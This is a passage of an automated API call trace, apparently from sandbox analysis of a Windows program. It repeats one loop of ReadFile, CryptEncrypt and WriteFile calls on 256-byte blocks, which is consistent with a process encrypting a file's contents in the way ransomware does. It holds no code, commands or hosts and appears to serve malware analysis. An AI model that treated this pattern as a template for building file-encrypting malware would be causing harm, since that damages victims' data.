hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.423] GetLastError () returned 0x0 [0144.423] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.423] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.423] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.423] GetLastError () returned 0x0 [0144.423] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.423] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.423] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.423] GetLastError () returned 0x0 [0144.423] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.423] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.423] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.423] GetLastError () returned 0x0 [0144.423] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.423] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.423] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.423] GetLastError () returned 0x0 [0144.423] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.423] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.423] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.423] GetLastError () returned 0x0 [0144.423] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.423] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.423] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.423] GetLastError () returned 0x0 [0144.424] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.424] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.424] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.424] GetLastError () returned 0x0 [0144.424] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.424] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.424] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.424] GetLastError () returned 0x0 [0144.424] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.424] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.424] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.424] GetLastError () returned 0x0 [0144.424] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.424] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.424] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.424] GetLastError () returned 0x0 [0144.424] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.424] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.425] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.425] GetLastError () returned 0x0 [0144.425] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.425] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.425] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.425] GetLastError () returned 0x0 [0144.425] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.425] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.425] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.425] GetLastError () returned 0x0 [0144.425] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.425] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.425] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.425] GetLastError () returned 0x0 [0144.425] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.425] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.425] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.425] GetLastError () returned 0x0 [0144.425] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.425] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.425] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.425] GetLastError () returned 0x0 [0144.425] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.425] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.425] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.426] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.426] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.426] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.426] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.426] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.426] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.426] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.426] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.426] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.426] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.426] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.426] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.426] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.427] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.427] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.427] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.427] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.427] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.427] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.427] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.427] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.427] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.427] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.427] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.427] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.427] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.427] GetLastError () returned 0x0 [0144.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.428] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.428] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.428] GetLastError () returned 0x0 [0144.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.428] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb810, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28fb810*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.428] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) 